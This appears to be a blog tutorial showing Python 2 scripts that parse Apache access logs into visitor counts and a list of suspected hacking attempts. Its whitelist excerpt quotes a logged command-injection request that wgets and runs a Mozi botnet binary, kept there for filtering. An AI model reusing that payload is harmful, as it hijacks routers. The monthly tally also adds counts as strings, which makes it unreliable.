Using Apache Log Files

for a Visitor Log and for Security

January 29, 2020

It's useful to be able to track the number of visitors to your website. One way to track visitors is some kind of third-party solution, but it's not difficult to do yourself and third-party solutions often carry undesirable baggage. One DIY technique involves adding a bit of code to each page that might be visited, whether this code is JavaScript, PHP, or something else. That code would then update a database of some kind every time the page is loaded.

But there's a simpler solution that makes use of the infrastructure that's already part of the server. As a side benefit, it allows you to track attempts made to hack your site. Lots of these attempts are pretty weak, like trying to read setup.php — maybe that would work on somebody, but really? Others are more clever, and you may find it interesting to see what they are in order to get a better picture of what kind of holes people are looking for.

Apache Logs

Apache produces log files that have the necessary information for visitor logs, and more. Below, I will describe how to extract information from these logs concerning who is visiting your site, what they are looking at, who might be trying to hack your site and how they're trying to hack it. What follows is a description of what's used on this website, which runs Apache on Debian Linux. If your server is different, then something similar should work, although you may have to modify a few things.

As Apache runs, it produces log files that appear in /var/log/apache2. Periodically, a cron job runs so that these files don't reach an unmanageable length. This cron job executes logrotate, which compresses the old log files, and starts a new set of log files. Precisely how logrotate treats the Apache log files is specified in /etc/logrotate.d/apache2, which has various settings. In my case, it includes the settings daily (run once a day), compress (compress old log files), delaycompress (do not compress the most recent old log file) and rotate 14 (keep up to 14 days of log files).

The log file we are interested in is access.log. In particular, every time a request is made of the server, this file indicates the IP address of the client that made the request, and what was requested. Other information is logged as well, but these are the two items that matter most when creating a visitor log and keeping on top of security.

Overall Plan

Each day, after logrotate runs, a cron job will digest the most recent old log file. In my case, this is access.log.1. A Python script parses the log file, and tallies the number of unique visitors and what they visited. The script also looks at a file which specifies those pages for which you care to tally visitors, along with a list of known hacking exploits that you want to ignore, presumably because you are confident that they're harmless to your site.

Beware. This approach logs hacking attempts, whether known to be harmless or newly observed, but it doesn't do anything to directly thwart them. If someone does gain unauthorized access, the first thing they'll do is modify the logs to hide their presence. Observing logs is not the way to catch them – although it doesn't hurt, and it's a good learning exercise.

The Workhorse

The script below is what does the bulk of the work. I call it parseapache.py. Half of the lines that appear in the script are comments, so it's not as long as it looks. With so many comments, I'll say no more.

#!/usr/bin/python

# This parses an apache2 access.log file into information about visitors.
#
# It takes several arguments:
# (1) the name of the log file
# (2) a file which specifies which requests to tally, which to ignore,
#     and which to report as potential hacking attempts
# (3) a file to which new hacking attempts is appended
# (4) a file where the number of times each page is visited is noted
# (5) a file where the ip addresses of visitors and the number of times
#     they loaded something is noted.
#
# The input log file (1)  will typically be a path, like 
# /var/log/apache2/access.log.1 
# See below for the format of file (2). File (3) could be used for
# many days running. Files (4) and (5) should probably be changed each
# time this script is executed since they are overwritten with new data.
#
# There are a variety of ways the information about visitors could be
# tallied. This counts the number of times each page (logged item in
# file (2)) was visited, including multiple visits to that page
# by the same person. If an ip address only made non-logged requests,
# then that address is not counted as a visitor.

import sys
import os

if len(sys.argv) != 6 :
    print "Need the five files to use..."
    sys.exit(0)

logFile = sys.argv[1]
reqFile = sys.argv[2]
hackFile = sys.argv[3]
pageFile = sys.argv[4]
ipFile = sys.argv[5]

if not os.path.exists(logFile) :
    print logFile + " is not a valid path."
    sys.exit(0);
if not os.path.exists(reqFile) :
    print reqFile + " is not a valid path."
    sys.exit(0);

# Read in a list of the things that are valid for the website.
# This is file of the form
# "valid request" [log]
# The idea is to compare this list with what is actually being
# requested from the server, and use it to generate a tally of what
# people are looking at. If the item is set to 'log', then it should
# be tallied. If 'log' does not appear, then that item is ignored.
# One reason to ignore things is that a particular page might request
# all sorts of data (images are a common example). The user only
# visited the page once, but there may be a whole cascade of requests
# due to that single visit.
#
# For comments, start the line with '#'. It must be the very first
# character of the line. Blank lines are ignored too.
#
# This can also be used as a way to keep ahead of nefarious
# activity. It may be that
# GET /phpmyadmin/scripts/setup.php HTTP/1.1
# is clearly an inappropriate request, but you also know that it's not
# going to cause any problems. Add any requests which are nefarious
# but harmless to the file, but do not set them to 'log', Then this
# script will only report *new* ways that people are digging around, and
# not old ones that you know are harmless.
#
# Listing the possible requests this way works well for a relatively
# modest and static website, but it's less than ideal once the site
# gets too big. There are various ways that the logic here could be
# extended to handle winnowing out the requests, like using regular
# expressions to match different requests.
#
# The data is stored as a dictionary (associative array) to make
# it easier to look up the log option. There's a second
# dictionary, with the same keys, which counts the number of times
# that request was made.
theFile = open(reqFile)
theHackFile = open(hackFile,"a+")

requestOption = {}
requestCount = {}

for line in theFile :
    if line[0] == '#' : continue
    if len(line) < 5 : continue
    guts = line.split('"')
    guts[2] = guts[2].lstrip().rstrip()
    requestOption[guts[1]] = guts[2]
    if guts[2] == 'log' :
        requestCount[guts[1]] = 0

theFile.close()

# What remains is to read in the log file and compare it with the list
# of valid things people might request.

theFile = open(logFile)

# The keys of this dictionary are the IP addresses of non-nefarious
# visitors, and the value is a count of the number of visits made.
visitors = {}

for line in theFile :
    # Each line is parsed using split(). It would probably be more
    # efficient to use regular expressions, but this is easier to
    # understand and modify. 
    
    # The first few characters are the client IP address.
    guts = line.split()
    ip = guts[0]
    if not visitors.has_key(ip) :
        visitors[ip] = 0

    remains = line[len(ip):]
    
    # The next few fields are uninteresting. There's the identd, which
    # is typically empty (a hyphen), and the user ID, also a hyphen.
    # Then the time, which takes the form [day/month/year:hh:mm:ss].
    # I don't care about that either. So, strip off everything up to 
    # the closing ']'.
    guts = remains.split(']')
    remains = remains[len(guts[0]) + 2:]
    
    # Next is the "request line" from the client. This will typically
    # be of the form "GET ..." It should be trying to get something 
    # nice and expected for your website, but you will also see things like
    # GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
    # and other things indicating that people are trying to find
    # vulnerabilities.
    #
    # This is where the validRequest dictionary comes in.
    guts = remains.split('"')
    request = guts[1]
    if not requestOption.has_key(request) :
        theHackFile.write(request + "\n")
    elif requestOption[request] == 'log' :
        requestCount[request] += 1
        visitors[ip] += 1

    # I don't care about anything that remains:
    #
    # Next is two numbers. The first is the status code, which should
    # be something like 200 (if all went well), or things like 404 for
    # page not found. The second number is the size of the file, in
    # bytes.
    #
    # Next, in quotes, is a link to where the user came from to this
    # information. It might be a page on your site, or it might be
    # somewhere else.
    #
    # Last, in quotes, is a description of the client's browser and system.
    
theFile.close()
theHackFile.close()

# Done parsing and tallying. Write the output.

# The list of pages visited and the number of visits.
theFile = open(pageFile, "w+")

for item in requestCount.keys() :
    theFile.write(str(requestCount[item]) + " " + item + "\n")

theFile.close()

# And a list of the visitors. For each ip address, this indicates the
# number of items requested. Any nefarious visitors have a count of 
# zero. They requested something, but not anything that is logged.

theFile = open(ipFile,"w+")

for item in visitors.keys() :                  
    if visitors[item] > 0 :
        theFile.write(str(visitors[item]) + " " + item + "\n")

theFile.close()

The script above reads in a file which is used to distinguish what to tally, what to ignore, and what might be a hacking attempt. Below is an excerpt from my version of this file (the actual file is much longer). Any request which is not listed in the file below will be appended to a "hacking attempt" file by the Python script above. You can look at this output file to help keep the information below up to date. Ideally, the output file listing hacking attempts should be blank. If it's not blank, then you are either facing a new type of hack or you've forgotten to update the information below to include new items that are genuinely part of your website.

# These are the things to be tallied. They all include 'log'.
"GET /overtheyardarm.html HTTP/1.1" log
"GET /generalbahamas.html HTTP/1.1" log
"GET /boatsystems.html HTTP/1.1" log
"GET /current_crossing/modelfrontend.html HTTP/1.1" log

# And stuff to ignore. First, stuff that's my own.
"GET /images/boating.jpg HTTP/1.1"
"GET /images/boat_repair.jpg HTTP/1.1"
"GET /images/yardarm.jpg HTTP/1.1"

# Now, stuff that's not very nefarious, and certainly harmless.
"GET / HTTP/1.1"
"GET / HTTP/1.0"
"GET /robots.txt HTTP/1.1"
"GET /html/public/index.php HTTP/1.1"

# Stuff that's nefarious and/or weird/stupid, but known to be harmless to me.
"GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1"
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"

Producing Summary Counts

The parseapache.py script above needs to run every day, after the Apache logs have been rotated. It's easiest to set up a cron job to do that. The script below handles calling the script above. It deals with things like choosing names for the various input and output files used by parseapache.py, and every month it produces summary statistics for the site.

#!/usr/bin/python

# This manages the way parseapache.py is run each day.
# It should be run as a daily cron job, after logrotate finishes
# rotating the apache logs in /var/log/apache2. If logrotate runs on
# some other schedule, like weekly or hourly, then this script should
# be run on a similar schedule. Because this uses dates to generate
# file names, don't run it at a time that is shortly before midnight.
# 
# This script will digest yesterday's log file, and produce three
# outputs. It will append new hacking attempts to hackattempt.txt,
# and it creates visitoripsYYYYMMDD.txt and pagevisitsYYYYMMDD.txt.
# To run, it needs a file specifying what to log and what to ignore.
# See parseapache.py for a description of these files.
#
# IN ADDITION, this checks to see whether it is being run on the
# first day of the month. If it is, then it also creates a summary
# file for the entire previous month. This is in
# visitsummaryYYYYMM.txt. It has less detailed information than the
# pair of daily files. The first line is the total number of unique IP
# addresses that visited your page in the previous month. If the same
# IP visited every day of the previous month, then it will be counted
# ~30 times. After the first line is the total number of times each
# page was loaded, where a "page" is a logged item as specified by
# valid_req.txt. 

import sys
import os
import datetime

# Change the working directory to make this easier to run as a cron
# job. Change this as appropriate.
os.chdir("/root/bin")

# This shouldn't change. After logrotate runs, this is the file for the
# previous day.
logFile = "/var/log/apache2/access.log.1"

# These are fixed as well.
reqFile = "valid_req.txt"
hackFile = "hackattempt.txt"

# Generate a string for YYYYMMDD
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
datestr = str(yesterday.year)
if yesterday.month < 10 :
    datestr += "0" + str(yesterday.month)
else :
    datestr += str(yesterday.month)
if yesterday.day < 10 :
    datestr += "0" + str(yesterday.day)
else :
    datestr += str(yesterday.day)

# These are the two daily output files.
pageFile = "pagevisits" + datestr + ".txt"
ipFile = "visitorips" + datestr + ".txt"

# Run the parser.
cmd = ("parseapache.py " +logFile+ " " +reqFile+ " " +hackFile+ " " 
       +pageFile+ " " +ipFile)
os.system(cmd)

# Done with the daily task. See if we should do the monthly summary.
if today.day != 1 :
    sys.exit(0)

# It's the 1st, so do the summary.
# Read in every file from the previous month, and add up the tallies.
datestr = str(yesterday.year)
if yesterday.month < 10 :
    datestr += "0" + str(yesterday.month)
else :
    datestr += str(yesterday.month)

# This tallies the number of visits to each page. It uses a dictionary
# where the keys are the pages and the values are the count of visits.
cmd = "ls pagevisits" +datestr+ "*.txt"
cmdout = os.popen(cmd) # This may be deprecated.

pageTally = {}
for filename in cmdout :
    theFile = open(filename.rstrip())
    for tallyLine in theFile :
        guts = tallyLine.split()
        thePage = tallyLine[len(guts[0]):].rstrip()
        if pageTally.has_key(thePage) :
            pageTally[thePage] += guts[0]
        else :
            pageTally[thePage] = guts[0]
    theFile.close()

cmdout.close()

# Tally the number of visitors. Each visitorsip file is a list of
# unique ips and the number of times that ip loaded something. All we
# want is the number of lines in each file. What follows counts the
# total number of lines in all the visitorip files for the previous month.
cmd = "ls visitorips" +datestr+ "*.txt"
cmdout = os.popen(cmd)

visitCount = 0
for line in cmdout :
    visitCount += len(open(line.rstrip()).readlines())

cmdout.close()

# Write the data to a file.
outFile = open("visitsummary" +datestr+ ".txt","w+")

outFile.write(str(visitCount) + "\n")

for item in pageTally.keys() :
    outFile.write(pageTally[item]+ " " +item+ "\n")

Improvements

These scripts work, but I may revisit the topic. Part of the reason it was done this way is to facilitate close observation of exactly what Apache is doing. The strategy above produces output that's not as pretty as it could be, and it takes more periodic maintenance than I would like. On the plus side, it's easy to understand and it allows you to examine, in an organized way, every request that the server sees.